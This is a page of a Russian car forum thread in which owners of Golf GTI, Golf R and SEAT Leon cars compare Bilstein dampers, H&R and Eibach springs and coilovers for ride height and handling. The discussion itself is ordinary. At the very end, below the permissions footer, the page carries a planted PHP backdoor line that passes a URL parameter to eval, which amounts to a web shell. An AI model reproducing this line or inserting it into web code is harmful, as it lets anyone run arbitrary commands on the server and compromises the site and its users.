+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 21

Тема: Выбор подвески и пружин!


  1. #11
    GTI-Racing Johny is on a distinguished road Аватар для Johny
    Регистрация
    16.11.2013
    Откуда
    Москва
    Машина
    Golf MK6 GTI
    Сообщений
    70
    Rugby 14: а можешь прислать фотку своего авто пожалуйста с б8 и ашер пружинами? У меня раньше стояли H&R пружины -30мм. Я так задолбался на лежачих полицейских вечно тормозить до упору, а потом ещё и цеплять брызговиками.

    Dimka Leon: тоже задумался о регулируемой подвеске. Но мне кажется с ней очень много гемора и она дороже стоит.

  2. #12
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Я бы тоже один раз выставил и забил - лень ее каждый раз гонять на регулировку и делать каждый раз сход развал за 2 штуки)))

  3. #13
    GTI-Racing Dimka Leon has a spectacular aura about Dimka Leon has a spectacular aura about Аватар для Dimka Leon
    Регистрация
    08.12.2011
    Откуда
    МСК
    Машина
    SEAT Leon 2.0T 6MT
    Сообщений
    313
    Цитата Сообщение от valj Посмотреть сообщение
    Я бы тоже один раз выставил и забил - лень ее каждый раз гонять на регулировку и делать каждый раз сход развал за 2 штуки)))
    прикалываетесь что ли?=) раз в сезон это делается, а бампер ремонтировать/менять и красить после каждой зимы не лень? Только не надо мне опять говорить а вот у меня нет и у мильёна моих знакомых тоже, посмотрите на бампера/губы заниженных машин по весне, и сами всё пойдёте=)
    Цитата Сообщение от Johny Посмотреть сообщение
    Но мне кажется с ней очень много гемора и она дороже стоит.
    если надумаете брать берите те, что дают нормальную гарантию и запчасти и расходники в наличии, а то многие винты неремнтнопригодные, амик один потёк, и комплект в помойку

  4. #14
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    катаюсь на bilstein b14, доволен как слон.
    а, ну еще стабы h&r.. в поворотах улыбка от удовольствия с лица не сходит

  5. #15
    GTI-Racing Johny is on a distinguished road Аватар для Johny
    Регистрация
    16.11.2013
    Откуда
    Москва
    Машина
    Golf MK6 GTI
    Сообщений
    70
    troyanov Я уж представляю))

    ---------- Сообщение добавлено 21.04.2014 в 00:03 ---------- Предыдущее сообщение размещено 20.04.2014 в 23:59 ----------

    Я когда болид свой купил, то там стояли пружины H&R -30мм. Ну это было просто невозможно ездить.. Даааа, машину круто держит, повороты проглатывает, но вот очень низко. Ты мне можешь прислать фотку как выглядит машина с bilstein b8 и пружинами H&R?? Мыло скину в личку

  6. #16
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    фотки отправил, есть только такие ;)
    нормальные фотки будут когда bbs приедут и летнюю резину одену..

    там кажется выставлено -40мм
    ставил в mojotec не так давно.

    ну да, низко.
    по бордюрам не езжу. перед лежачими приходится оттормаживаться до 5-10 км/ч
    но оно того стоит :)


    Цитата Сообщение от Johny Посмотреть сообщение
    troyanov Я уж представляю))

    ---------- Сообщение добавлено 21.04.2014 в 00:03 ---------- Предыдущее сообщение размещено 20.04.2014 в 23:59 ----------

    Я когда болид свой купил, то там стояли пружины H&R -30мм. Ну это было просто невозможно ездить.. Даааа, машину круто держит, повороты проглатывает, но вот очень низко. Ты мне можешь прислать фотку как выглядит машина с bilstein b8 и пружинами H&R?? Мыло скину в личку

  7. #17
    Новичок Revo is on a distinguished road Аватар для Revo
    Регистрация
    12.03.2014
    Откуда
    Мск
    Машина
    Golf R
    Сообщений
    135
    Цитата Сообщение от Dimka Leon Посмотреть сообщение
    я всего лишь обратил внимание, что есть возможность регулировки, а вы навязываете своё мнение, утверждая что НИКТО НЕ КРУТИТ, поэтому я и сказал что не надо говорить за всех ;) я как раз не утверждал что все крутят... у меня знакомых на винтах не меньше, а как бы больше на порядок ;) по причине которую я изложил ниже. Если ставить кривыми руками и резьбы не обрабатывать смазкой при установке, то винты могут потерять возможность регулировки, но это вопрос кривых рук и ленивых установщиков.
    А если были винты, то давайте с конкретикой, какие, и почему были заменены на пружины, вот это было бы по теме...
    как можно сорвать резьбу на новых винтах? знаю, что лучший способ сохранить регулировку по высоте - одевать чехлы :)
    Последний раз редактировалось Revo; 21.04.2014 в 12:13.

  8. #18
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    Цитата Сообщение от Johny Посмотреть сообщение
    Rugby 14: а можешь прислать фотку своего авто пожалуйста с б8 и ашер пружинами? У меня раньше стояли H&R пружины -30мм. Я так задолбался на лежачих полицейских вечно тормозить до упору, а потом ещё и цеплять брызговиками.

    Dimka Leon: тоже задумался о регулируемой подвеске. Но мне кажется с ней очень много гемора и она дороже стоит.
    В какой-то теме недавно скидывал. Те стер, вот другие. На первой как раз сравнение стока и ашеров на б8
    Вложение 15699Вложение 15700
    Tough Guys Don`t Dance ©

    .:Revo St.2+

  9. #19
    Новичок Revo is on a distinguished road Аватар для Revo
    Регистрация
    12.03.2014
    Откуда
    Мск
    Машина
    Golf R
    Сообщений
    135
    Цитата Сообщение от Johny Посмотреть сообщение
    troyanov Я уж представляю))

    Я когда болид свой купил, то там стояли пружины H&R -30мм. Ну это было просто невозможно ездить.. Даааа, машину круто держит, повороты проглатывает, но вот очень низко. Ты мне можешь прислать фотку как выглядит машина с bilstein b8 и пружинами H&R?? Мыло скину в личку
    так с установкой бильштайнов б8 машина выше не станет. высоту регулируют пружины.

  10. #20
    GTI-Racing Dimka Leon has a spectacular aura about Dimka Leon has a spectacular aura about Аватар для Dimka Leon
    Регистрация
    08.12.2011
    Откуда
    МСК
    Машина
    SEAT Leon 2.0T 6MT
    Сообщений
    313
    Цитата Сообщение от Revo Посмотреть сообщение
    как можно сорвать резьбу на новых винтах? знаю, что лучший способ сохранить регулировку по высоте - одевать чехлы :)
    резьбу может тупо заклинить от грязи и зимних солей, чухлы хорошо конечно, но они создают эффект паровой бани и усиливают коррозию внутренностей

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Выбор подвески на летний сезон Bilstein B8 / Koni Sport
    от 01RUS в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 1
    Последнее сообщение: 02.03.2012, 18:51
  2. Выбор подвески на GTI 6
    от Opa_Opa в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 53
    Последнее сообщение: 08.12.2010, 19:00
  3. Выбор подвески
    от TOMAT в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 23
    Последнее сообщение: 12.08.2009, 21:32
  4. Выбор Подвески На G3 Vr6
    от EasyBoy в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 16
    Последнее сообщение: 12.04.2009, 19:55
  5. Выбор Пружин
    от Marly в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 3
    Последнее сообщение: 07.06.2008, 11:14

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}